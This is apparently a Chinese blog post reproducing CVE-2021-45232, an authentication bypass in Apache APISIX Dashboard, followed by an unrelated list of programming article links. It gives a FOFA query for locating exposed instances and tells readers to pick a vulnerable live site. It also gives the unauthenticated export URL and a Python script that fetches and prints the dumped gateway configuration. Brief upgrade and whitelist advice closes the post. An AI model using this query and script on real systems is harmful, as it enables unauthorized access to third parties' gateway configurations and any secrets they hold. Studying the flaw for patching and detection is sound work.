super 硕
super 硕

Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)

Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)

漏洞描述

Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。

CVE编号

CVE-2021-45232

FOFA语句

title="Apache APISIX Dashboard"

影响范围

Apache APISIX Dashboard < 2.10.1

根据目前FOFA系统最新数据(一年内数据),显示全球范围内(title=“Apache APISIX Dashboard”)共有 1,110 个相关服务对外开放。中国使用数量最多,共有 966 个;美国第二,共有 55 个;中国香港第三,共有 21 个;日本第四,共有 19 个;新加坡第五,共有 18 个。

漏洞复现

使用fofa进行资产收集
Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)_第1张图片
寻找一个有漏洞的网站

漏洞POC

ip+port/apisix/admin/migrate/export

Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)_第2张图片
Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)_第3张图片

漏洞检测脚本

import urllib.request
import ssl

url=input("输入测试地址\n>>>") + "/apisix/admin/migrate/export"
context = ssl._create_unverified_context()
header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "X-Forwarded-For": "127.0.0.1"
        }
try:
    request = urllib.request.Request(url=url, headers=header)
    response = urllib.request.urlopen(request, context=context, timeout=10)
    html = str(response.read())
    if "Routes" in html or "hosts" in html and response.status == 200:
        print(html)
        print("[" + url + "]" + "[===存在Apache APISIX Dashboard身份认证绕过漏洞===]")
    else:
        print("[" + url + "]" + "[不存在Apache APISIX Dashboard身份认证绕过漏洞]")
except Exception as e:
    print("[" + url + "]" + "[不存在漏洞]", format(e))

Apache APISIX Dashboard 身份验证绕过漏洞(CVE-2021-45232)_第4张图片

修复建议

1、升级至最新安全版本 Apache APISIX Dashboard 2.10.1:https://github.com/apache/apisix-dashboard/releases/tag/v2.10.1
2、修改默认用户名和密码,并配置访问 Apache APISIX Dashboard的白名单。

你可能感兴趣的:(漏洞复现,未授权访问,Apache)

  • Django REST framework - 限流 djangopython
    概述就像权限控制一样,限流用于决定是否授权请求。限流表示一种临时状态,用于控制客户端可以向API发送请求的速率。就像权限控制一样,可以使用多个限流策略。例如,你的API可能对未认证请求设置严格的限流策略,而对已认证请求设置宽松的限流策略。如果不同部分的API由于某些服务资源消耗较高,需要施加不同的限制,也可以使用多个限流策略。此外,还可以同时使用突发流量限流和持续流量限流,例如将用户限制为每分钟最
  • Django REST framework - 权限 djangopython
    权限认证或识别本身通常不足以获得信息或代码的访问权限。为此,请求访问的实体必须具有授权。—Apple开发者文档权限、认证和限流共同决定了请求是否应该被允许访问。权限检查总是在视图的主要逻辑开始之前运行。权限检查通常会使用request.user和.authrequest属性中的认证信息来确定传入的请求是否应该被允许。权限用于授予或拒绝不同类别的用户访问API的不同部分。RESTframework中
  • 关于AWS使用(一)——申请付费版亚马逊云服务器的详细流程 m0_63984008 linux服务器mysql
    一、创建账号:注册准备:1,一个在用邮箱2,一张在用的有Visa或者Master标志的信用卡(要支持美元预授权)3,一部在用的电话4,一个支持key文件导入的ssh客户端(我后面只介绍linux下使用ssh命令行客户端)5,最好是有软件(不是必要的,主要是访问速度的问题。耐心不好的人一定要访问)步骤1,注册:亚马逊云计算中心的网址:https://aws.amazon.com/cn(如果英文可以的
  • container_memory_working_set_bytes` 与 `container_memory_usage_bytes` 的区别 强哥之神 prometheus容器dockerk8s
    在Prometheus中,container_memory_working_set_bytes与container_memory_usage_bytes的区别如下:计算方式及包含内容:container_memory_usage_bytes:表示容器当前使用的总内存,包括所有内存,不管这些内存是否最近被访问过,也不管其是否可以被操作系统回收,即它包含了缓存、工作集等所有内存部分。container
  • 未来有确定发展的技术公司 兔老大RabbitMQ 开发语言计算机外设
    ArmHoldings(ARM):潜力评估与小市值高增长投资机会分析一、ArmHoldings(ARM)深度剖析核心业务与市场地位当前市值:约140亿美元(2023年9月IPO后,股价波动显著)业务模式:CPU架构设计与IP授权(知识产权企业,非芯片制造商)市场渗透率:全球超过99%智能手机、约45%消费电子设备采用ARM架构营收结构:处理器授权费:25-30%基于出货量的版税:60-65%软件与
  • python连接db2的官方库ibm_db的api 数据-脚本-资源-管道 ibm-dbpython数据库python
    IBM_DBAPI详细文档ibm_db.active描述检查指定的数据库连接是否处于活动状态传入参数connection:有效的数据库连接资源返回值True:资源处于活动状态False:资源未处于活动状态例子importibm_dbconn=ibm_db.connect("DATABASE=testdb;HOSTNAME=localhost;PORT=50000;PROTOCOL=TCPIP;UI
  • Python 爬虫实战:动态数据+定时任务+价格预测全链路解析 西攻城狮北 python爬虫开发语言
    一、动态数据捕获技术栈1.1目标网站分析(以某OTA平台为例)实现原理:本节演示如何使用Selenium自动化浏览器访问机票查询页面。选择Selenium而非直接请求API的原因在于:目标网站采用JavaScript动态渲染价格数据需要模拟用户操作(如选择日期、舱位)触发数据加载需处理反爬机制(如Cookie验证、行为检测)fromseleniumimportwebdriverfromseleni
  • Java:动态代理,反射Method.invoke方法 十秒耿直拆包选手 ProgrammingupJavajava
    简介在Java中,`java.lang.reflect.Method`类的`invoke`方法用于在运行时动态调用一个方法。这个方法属于Java反射机制的一部分。反射允许程序在运行时访问、检测和修改它本身的结构和行为。简介方法签名publicObjectinvoke(Objectobj,Object...args)throwsIllegalAccessException,InvocationTar
  • python中classmethod中讲解 AI专题精讲 pythonpython
    classmethod中的cls和self区别在Python中,@classmethod是一个装饰器,用于定义类方法。类方法与实例方法不同,它操作的是类本身,而不是类的实例。cls和self的区别:cls:cls是类方法的第一个参数,代表类本身。类方法通过@classmethod装饰器定义,调用时不需要创建类的实例。cls通常用于访问或修改类级别的属性,或者创建类的实例。self:self是实例方
  • Python中cls和self的区别 单单一个越 pythonpython开发语言
    self和cls都是对类或实例的引用,但它们在Python中的用法和含义是不同的。self是实例方法的第一个参数,它代表类的实例。self只能在实例方法中使用,用于访问实例的属性和方法。每个实例都有自己的self,它们互不影响。cls是类方法的第一个参数,它代表类本身。cls只能在类方法中使用,用于访问类的属性和方法。所有实例共享同一个cls。以下是一个简单的示例classMyClass:coun
  • FHQ无旋平衡树可持久化详解 xwztdas 线段树/平衡树FHQTreap平衡树数据结构可持久化
    引入在上一篇题解,我们研究了FHQ实现维护有序序列与区间翻转,在这一篇题解,我们将要探讨关于FHQ实现可持久化的操作。例题洛谷P3835【模板】可持久化平衡树由题目可得这显然必须使用可持久化,我们先了解一下什么是可持久化。可持久化定义可持久化是指一个数据结构在修改操作(如插入、删除、更新)后,仍然保留其修改前的版本,并且能够同时访问修改前和修改后的所有历史版本。他的关键特征如下:保留历史版本:每次
  • Hibernate中save与saveOrUpdate的差异解析 代码的余温 hibernateoracle数据库
    在Hibernate中,save()和saveOrUpdate()都是用于持久化对象的方法,但它们的适用场景和行为有显著差异:1.save()方法核心行为:仅适用于瞬时态(Transient)对象(即新创建、未与Session关联的对象)。会立即为对象分配一个标识符(ID),并计划在事务提交时执行INSERT操作。若尝试对已持久化(Persistent)或游离态(Detached)对象调用save
  • PCSC读卡器示例程序揭秘与实践 路怜涯
    本文还有配套的精品资源,点击获取简介:本项目“PCSC_Demo_PCSC_oldct2_读卡_PCSC型读卡器读卡软件_circle7me.zip”展示了一个使用PCSC(个人计算机智能卡)标准接口读取智能卡数据的演示程序。PCSC是智能卡交互的标准,由SCIA制定,允许应用程序通过统一API访问智能卡。项目包含源代码,支持多种编程语言,并展示了PC/SC架构、API接口、智能卡通信协议、读卡器
  • Gemini Cli登录问题排查 ascarl2010 前端javascript开发语言
    这个错误信息是一个很典型的GoogleCloudPlatform(GCP)的API权限问题。别担心,这通常是可以解决的。错误分析我帮你分析一下这个错误信息的核心内容:"code":403,"status":"PERMISSION_DENIED":这意味着“禁止访问”。你的请求被服务器理解了,但服务器拒绝授权。"message":"PermissiondeniedonresourceprojectM
  • 特别版本,带检测USB总线驱动未安装提醒 开源的6lowpan 无线USB转换器无线调试器无线串口无线JLinkC#USB检测
    技术支持中,发现未安装驱动占比非常高;网盘丢了一个检测驱动是否已经安装版本;代码C#:search_dev是usb设备管理器中显示的Name,typestring;已正确安装:返回0在这之前写了一个查找Guid版本,结果不行,卸载驱动Guid还是存在;重启也没用;//获取USB控制器及其相关联的设备实体ManagementObjectCollectionUSBControllerDeviceCol
  • 【Actix Web】构建高性能 Rust API:Actix Web 最佳实践与进阶指南 LCG元 前端前端rust开发语言
    目录一、高性能API架构设计1.1系统架构图1.2核心组件二、项目初始化与配置2.1创建项目2.2添加依赖(Cargo.toml)2.3配置文件(config/default.toml)三、核心模块实现3.1应用状态管理(src/state.rs)3.2数据模型定义(src/models.rs)四、认证与授权系统4.1JWT认证流程4.2JWT工具函数(src/utils/jwt.rs)4.3认证
  • Oracle 角色与自定义角色深度解析 不辉放弃 oracle数据库大数据开发
    一、角色(Role)的核心概念在Oracle中,角色是权限的逻辑集合,通过将多个权限封装到角色中,可实现权限的批量管理。角色具有以下特性:权限容器:可包含系统权限、对象权限甚至其他角色简化管理:通过角色分配权限,避免直接对用户授权的繁琐操作动态权限控制:可通过激活/禁用角色临时调整用户权限二、系统预定义角色Oracle数据库自带多种预定义角色,按功能可分为以下几类:1.核心管理角色角色名称权限范围
  • 鲲鹏加速引擎故障排查思路 hid_clf-2oizpt7skaq linux运维服务器
    一、加速器软件逻辑架构二、编译类问题排查思路步骤一、检查固件版本检查项:检查固件版本是否已升级到鲲鹏加速引擎所支持的版本,即iBMCV365及以上版本。该步骤可能出现的问题:由于固件未升级可能导致鲲鹏加速引擎的硬件设备未被使能,在安装鲲鹏加速软件时可能会报“nosuchdevice”错误信息。步骤二、检查license检查项:检查license是否已经安装;若license已安装,是否已生效。该步
  • 探秘HarmonyOS驱动平台:开启万物互联新时代 大雨淅淅 #HarmonyOS开发harmonyos华为
    目录一、HarmonyOS驱动平台初印象二、HarmonyOS驱动平台的架构解析三、HarmonyOS驱动框架(HDF)的特点3.1统一外设访问能力3.2驱动开发与管理框架优势3.3组件化的驱动模型四、HarmonyOS驱动平台的技术特性4.1分布式软总线奠定连接基础4.2分布式设备虚拟化整合资源4.3分布式数据管理保障数据流转4.4分布式任务调度优化任务执行五、HarmonyOS驱动平台的应用场
  • NAT穿透让你的内网服务轻松破墙而出,无公网IP也能给外网互联网连接访问 搬码临时工 tcp/ip网络智能路由器
    一、什么是内网穿透(NAT穿透)?在现代网络环境中,绝大多数家庭和企业都通过路由器(NAT设备)连接互联网。NAT(NetworkAddressTranslation,网络地址转换)允许多个内网设备共享一个公网IP,但也带来了一个问题:外部网络无法直接访问内网主机。内网穿透(NAT穿透)就是指让外部网络能够访问位于NAT后面的内网主机的技术。常见应用场景包括:远程桌面、远程SSH、数据库、API接
  • weblogic 启动常见错误解决 ithadoop weblogicoracleoracleweblogic
    以下是WebLogic启动常见错误及解决方案的图文汇总(基于最新实践整理):一、控制台无法访问(端口冲突)现象:浏览器访问http://localhost:7001/console失败解决步骤:检查端口占用:netstat-an|grep7001#Linuxnetstat-ano|findstr7001#Windows若端口冲突,修改config.xml中的ListenPort或终止占用进程二、节
  • C语言MySQL API使用详解 吸嘎嘎能手 mysql数据库c++c语言
    连接数据库的步骤众所周知,MySQL数据库是一个典型的C/S结构,即:客户端和服务器端。如果我们部署好了MySQL服务器,想要在客户端访问服务器端的数据,在编写程序的时候就可以通过官方提供的C语言的API来实现。在程序中连接MySql服务器,主要分为已经几个步骤:初始化连接环境连接mysql的服务器,需要提供如下连接数据:服务器的IP地址服务器监听的端口(默认端口是3306)连接服务器使用的用户名
  • C/C++连接mysql(api接口方法详解) 陈七. 开发环境问题数据库mysqlc语言c++数据库
    文章目录前言代码笔记CAPI基本接口概述附1:CAPI基本数据结构参考附2:CAPI基本函数参考前言本篇记录C/C++连接mysql利用mysql的api接口的方法:这个方法的代码基本上很久都没有变过了,这里做个笔记来简单学习一下,还有一种方法等有时间了解后再来更新使用API的方式连接,需要先做环境配置,加载mysql的头文件和lib文件。可以看我之前的一篇文章VS中C/C++访问MySQL数据库
  • Mysql—C语言API接口
    Mysql—C语言API接口一、mysql-arp访问数据的操作流程1.初始化mysql操作句柄;2.连接mysql服务器;3.设置mysql客户端字符集(保持与服务器一致);4.选择要操作的数据库;5.定义sql语句,并且执行语句;6.将查询结果保存到本地;7.获取结果中的条数和列数;8.根据条数和列数遍历结果集;9.释放保存在本地的结果集;10.关闭mysql句柄,释放资源;二、接口认识1.初
  • 磁链转种子,种子转磁链 CILIFA 爬虫
    前段时间做DHT爬虫,,奈何大量INFOHASH无法转换为种子文件,网络上所提供的几种方法也基本上已经失效(/效率低下)未测试DHT009协议,遂通过该思路借助迅雷实现。git地址:https://github.com/ZRory/magnet-torrent测试地址:https://www.orboss.com
  • Python的字符串驻留机制 Dingdangr java开发语言
    Python的字符串驻留(StringInterning)机制是Python内存管理中的一个重要特性,它旨在优化字符串对象的存储和访问效率。字符串驻留,简单来说,就是Python解释器为了节省内存和提高性能,会在内部维护一个字符串对象的池(或称为表),对于某些特定的字符串对象,Python会尝试重用已有的对象而不是每次都创建一个新的对象。这种机制特别适用于那些频繁出现的短字符串,如标识符、关键字、
  • Python中以下划线开头的变量名的特点
    在Python中,以下划线开头的变量名具有一些特殊的特点和用途,这些特点和用途主要遵循Python的命名约定和内部实现机制。以下是对这些特点和用途的详细解释:1.单下划线开头的变量名(_xxx)特点保护变量:在类或模块中,以单下划线开头的变量名通常被视为“保护”的(protected),这是一种命名约定,旨在表示这些变量是内部使用的,不应该被外部代码直接访问。然而,需要注意的是,Python并不强
  • Vue部署Nginx之后,后台请求404 zhou_Tian VueNginxnginxvue.js运维
    部署到Nginx后,配置在vue中的针对某些请求(比如后端请求)的代理会失效(表现为这部分请求会404错误,但是项目css等静态资源都能正常访问),这时需要对Nginx配置相应的请求代理。比如我们Vue项目的vue.config.js配置如下:期望能将/api/为前缀的请求全都代理到http://10.3.0.145:8008/,本地以开发模式运行一切正常,但发布到Nginx后这个代理好像就失效了
  • Docker Harbor私有仓库详解 CloudJourney docker容器运维
    DockerHarbor概述Harbor是一个开源的企业级Docker镜像仓库项目,提供了镜像存储、签名、访问控制等功能。相比于Docker官方提供的Registry,Harbor提供了更加丰富的功能和更完善的安全机制,适用于企业级应用、云原生平台等场景。Harbor搭建命令1.安装Harbor依赖在安装Harbor之前,需要确保系统中已经安装了Docker和DockerCompose。此外,还需
  • 【Docker】docker的数据持久化 一直奔跑在路上 Dockerdockerjava容器
    在Docker中,容器的文件系统是临时的。如果容器被删除或重新创建,所有未保存的数据都会丢失。为了解决这个问题,我们可以使用以下两种方式来持久化数据:方式一:使用BindMounts实现数据持久化BindMounts允许你将宿主机文件系统中的目录或文件挂载到容器内的某个目录。这种方式非常直接,适合在开发和测试环境中使用。案例:运行一个Nginx容器,并将宿主机上的html目录挂载到容器内的/usr
  • 开发者关心的那些事 圣子足道 ios游戏编程apple支付
    我要在app里添加IAP,必须要注册自己的产品标识符(product identifiers)。产品标识符是什么? 产品标识符(Product Identifiers)是一串字符串,它用来识别你在应用内贩卖的每件商品。App Store用产品标识符来检索产品信息,标识符只能包含大小写字母(A-Z)、数字(0-9)、下划线(-)、以及圆点(.)。你可以任意排列这些元素,但我们建议你创建标识符时使用
  • 负载均衡器技术Nginx和F5的优缺点对比 bijian1013 nginxF5
            对于数据流量过大的网络中,往往单一设备无法承担,需要多台设备进行数据分流,而负载均衡器就是用来将数据分流到多台设备的一个转发器。         目前有许多不同的负载均衡技术用以满足不同的应用需求,如软/硬件负载均衡、本地/全局负载均衡、更高
  • LeetCode[Math] - #9 Palindrome Number Cwind javaAlgorithm题解LeetCodeMath
    原题链接:#9 Palindrome Number   要求: 判断一个整数是否是回文数,不要使用额外的存储空间   难度:简单   分析: 题目限制不允许使用额外的存储空间应指不允许使用O(n)的内存空间,O(1)的内存用于存储中间结果是可以接受的。于是考虑将该整型数反转,然后与原数字进行比较。 注:没有看到有关负数是否可以是回文数的明确结论,例如
  • 画图板的基本实现 15700786134 画图板
     要实现画图板的基本功能,除了在qq登陆界面中用到的组件和方法外,还需要添加鼠标监听器,和接口实现。 首先,需要显示一个JFrame界面: public class DrameFrame extends JFrame {              //显示
  • linux的ps命令 被触发 linux
    Linux中的ps命令是Process Status的缩写。ps命令用来列出系统中当前运行的那些进程。ps命令列出的是当前那些进程的快照,就是执行ps命令的那个时刻的那些进程,如果想要动态的显示进程信息,就可以使用top命令。 要对进程进行监测和控制,首先必须要了解当前进程的情况,也就是需要查看当前进程,而 ps 命令就是最基本同时也是非常强大的进程查看命令。使用该命令可以确定有哪些进程正在运行
  • Android 音乐播放器 下一曲 连续跳几首歌 肆无忌惮_ android
    最近在写安卓音乐播放器的时候遇到个问题。在MediaPlayer播放结束时会回调 player.setOnCompletionListener(new OnCompletionListener() { @Override public void onCompletion(MediaPlayer mp) { mp.reset(); Log.i("H
  • java导出txt文件的例子 知了ing javaservlet
    代码很简单就一个servlet,如下: package com.eastcom.servlet; import java.io.BufferedOutputStream; import java.io.IOException; import java.net.URLEncoder; import java.sql.Connection; import java.sql.Resu
  • Scala stack试玩, 提高第三方依赖下载速度 矮蛋蛋 scalasbt
    原文地址: http://segmentfault.com/a/1190000002894524 sbt下载速度实在是惨不忍睹, 需要做些配置优化 下载typesafe离线包, 保存为ivy本地库 wget http://downloads.typesafe.com/typesafe-activator/1.3.4/typesafe-activator-1.3.4.zip 解压r
  • phantomjs安装(linux,附带环境变量设置) ,以及casperjs安装。 alleni123 linuxspider
    1. 首先从官网 http://phantomjs.org/下载phantomjs压缩包,解压缩到/root/phantomjs文件夹。 2. 安装依赖 sudo yum install fontconfig freetype libfreetype.so.6 libfontconfig.so.1 libstdc++.so.6 3. 配置环境变量 vi /etc/profil
  • JAVA IO FileInputStream和FileOutputStream,字节流的打包输出 百合不是茶 java核心思想JAVA IO操作字节流
    在程序设计语言中,数据的保存是基本,如果某程序语言不能保存数据那么该语言是不可能存在的,JAVA是当今最流行的面向对象设计语言之一,在保存数据中也有自己独特的一面,字节流和字符流 1,字节流是由字节构成的,字符流是由字符构成的 字节流和字符流都是继承的InputStream和OutPutStream ,java中两种最基本的就是字节流和字符流   类 FileInputStream
  • Spring基础实例(依赖注入和控制反转) bijian1013 spring
    前提条件:在http://www.springsource.org/download网站上下载Spring框架,并将spring.jar、log4j-1.2.15.jar、commons-logging.jar加载至工程1.武器接口 package com.bijian.spring.base3; public interface Weapon { void kil
  • HR看重的十大技能 bijian1013 提升能力HR成长
        一个人掌握何种技能取决于他的兴趣、能力和聪明程度,也取决于他所能支配的资源以及制定的事业目标,拥有过硬技能的人有更多的工作机会。但是,由于经济发展前景不确定,掌握对你的事业有所帮助的技能显得尤为重要。以下是最受雇主欢迎的十种技能。   一、解决问题的能力   每天,我们都要在生活和工作中解决一些综合性的问题。那些能够发现问题、解决问题并迅速作出有效决
  • 【Thrift一】Thrift编译安装 bit1129 thrift
    什么是Thrift The Apache Thrift software framework, for scalable cross-language services development, combines a software stack with a code generation engine to build services that work efficiently and s
  • 【Avro三】Hadoop MapReduce读写Avro文件 bit1129 mapreduce
    Avro是Doug Cutting(此人绝对是神一般的存在)牵头开发的。 开发之初就是围绕着完善Hadoop生态系统的数据处理而开展的(使用Avro作为Hadoop MapReduce需要处理数据序列化和反序列化的场景),因此Hadoop MapReduce集成Avro也就是自然而然的事情。 这个例子是一个简单的Hadoop MapReduce读取Avro格式的源文件进行计数统计,然后将计算结果
  • nginx定制500,502,503,504页面 ronin47 nginx 错误显示
    server { listen 80; error_page 500/500.html; error_page 502/502.html; error_page 503/503.html; error_page 504/504.html; location /test {return502;}} 配置很简单,和配
  • java-1.二叉查找树转为双向链表 bylijinnan 二叉查找树
    import java.util.ArrayList; import java.util.List; public class BSTreeToLinkedList { /* 把二元查找树转变成排序的双向链表 题目: 输入一棵二元查找树,将该二元查找树转换成一个排序的双向链表。 要求不能创建任何新的结点,只调整指针的指向。 10 / \ 6 14 / \
  • Netty源码学习-HTTP-tunnel bylijinnan javanetty
    Netty关于HTTP tunnel的说明: http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/socket/http/package-summary.html#package_description 这个说明有点太简略了 一个完整的例子在这里: https://github.com/bylijinnan
  • JSONUtil.serialize(map)和JSON.toJSONString(map)的区别 coder_xpf jqueryjsonmapval()
     JSONUtil.serialize(map)和JSON.toJSONString(map)的区别   数据库查询出来的map有一个字段为空   通过System.out.println()输出 JSONUtil.serialize(map): {"one":"1","two":"nul
  • Hibernate缓存总结 cuishikuan 开源sshjavawebhibernate缓存三大框架
    一、为什么要用Hibernate缓存? Hibernate是一个持久层框架,经常访问物理数据库。 为了降低应用程序对物理数据源访问的频次,从而提高应用程序的运行性能。 缓存内的数据是对物理数据源中的数据的复制,应用程序在运行时从缓存读写数据,在特定的时刻或事件会同步缓存和物理数据源的数据。   二、Hibernate缓存原理是怎样的? Hibernate缓存包括两大类:Hib
  • CentOs6 dalan_123 centos
    首先su - 切换到root下面1、首先要先安装GCC GCC-C++ Openssl等以来模块:yum -y install make gcc gcc-c++ kernel-devel m4 ncurses-devel openssl-devel2、再安装ncurses模块yum -y install ncurses-develyum install ncurses-devel3、下载Erang
  • 10款用 jquery 实现滚动条至页面底端自动加载数据效果 dcj3sjt126com JavaScript
      无限滚动自动翻页可以说是web2.0时代的一项堪称伟大的技术,它让我们在浏览页面的时候只需要把滚动条拉到网页底部就能自动显示下一页的结果,改变了一直以来只能通过点击下一页来翻页这种常规做法。 无限滚动自动翻页技术的鼻祖是微博的先驱:推特(twitter),后来必应图片搜索、谷歌图片搜索、google reader、箱包批发网等纷纷抄袭了这一项技术,于是靠滚动浏览器滚动条
  • ImageButton去边框&Button或者ImageButton的背景透明 dcj3sjt126com imagebutton
    在ImageButton中载入图片后,很多人会觉得有图片周围的白边会影响到美观,其实解决这个问题有两种方法 一种方法是将ImageButton的背景改为所需要的图片。如:android:background="@drawable/XXX" 第二种方法就是将ImageButton背景改为透明,这个方法更常用 在XML里;    <ImageBut
  • JSP之c:foreach eksliang jspforearch
    原文出自:http://www.cnblogs.com/draem0507/archive/2012/09/24/2699745.html <c:forEach>标签用于通用数据循环,它有以下属性 属 性 描 述 是否必须 缺省值 items 进行循环的项目 否 无 begin 开始条件 否 0 end 结束条件 否 集合中的最后一个项目 step 步长 否 1
  • Android实现主动连接蓝牙耳机 gqdy365 android
    在Android程序中可以实现自动扫描蓝牙、配对蓝牙、建立数据通道。蓝牙分不同类型,这篇文字只讨论如何与蓝牙耳机连接。 大致可以分三步: 一、扫描蓝牙设备: 1、注册并监听广播: BluetoothAdapter.ACTION_DISCOVERY_STARTED BluetoothDevice.ACTION_FOUND BluetoothAdapter.ACTION_DIS
  • android学习轨迹之四:org.json.JSONException: No value for hyz301 json
    org.json.JSONException: No value for items  在JSON解析中会遇到一种错误,很常见的错误   06-21 12:19:08.714 2098-2127/com.jikexueyuan.secret I/System.out﹕ Result:{"status":1,"page":1,&
  • 干货分享:从零开始学编程 系列汇总 justjavac 编程
    程序员总爱重新发明轮子,于是做了要给轮子汇总。 从零开始写个编译器吧系列 (知乎专栏) 从零开始写一个简单的操作系统 (伯乐在线) 从零开始写JavaScript框架 (图灵社区) 从零开始写jQuery框架 (蓝色理想 ) 从零开始nodejs系列文章 (粉丝日志) 从零开始编写网络游戏 
  • jquery-autocomplete 使用手册 macroli jqueryAjax脚本
    jquery-autocomplete学习 一、用前必备 官方网站:http://bassistance.de/jquery-plugins/jquery-plugin-autocomplete/ 当前版本:1.1 需要JQuery版本:1.2.6 二、使用 <script src="./jquery-1.3.2.js" type="text/ja
  • PLSQL-Developer或者Navicat等工具连接远程oracle数据库的详细配置以及数据库编码的修改 超声波 oracleplsql
      在服务器上将Oracle安装好之后接下来要做的就是通过本地机器来远程连接服务器端的oracle数据库,常用的客户端连接工具就是PLSQL-Developer或者Navicat这些工具了。刚开始也是各种报错,什么TNS:no listener;TNS:lost connection;TNS:target hosts...花了一天的时间终于让PLSQL-Developer和Navicat等这些客户
  • 数据仓库数据模型之:极限存储--历史拉链表 superlxw1234 极限存储数据仓库数据模型拉链历史表
    在数据仓库的数据模型设计过程中,经常会遇到这样的需求: 1. 数据量比较大; 2. 表中的部分字段会被update,如用户的地址,产品的描述信息,订单的状态等等; 3. 需要查看某一个时间点或者时间段的历史快照信息,比如,查看某一个订单在历史某一个时间点的状态,    比如,查看某一个用户在过去某一段时间内,更新过几次等等; 4. 变化的比例和频率不是很大,比如,总共有10
  • 10点睛Spring MVC4.1-全局异常处理 wiselyman spring mvc
    10.1 全局异常处理 使用@ControllerAdvice注解来实现全局异常处理; 使用@ControllerAdvice的属性缩小处理范围 10.2 演示 演示控制器 package com.wisely.web; import org.springframework.stereotype.Controller; import org.spring
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他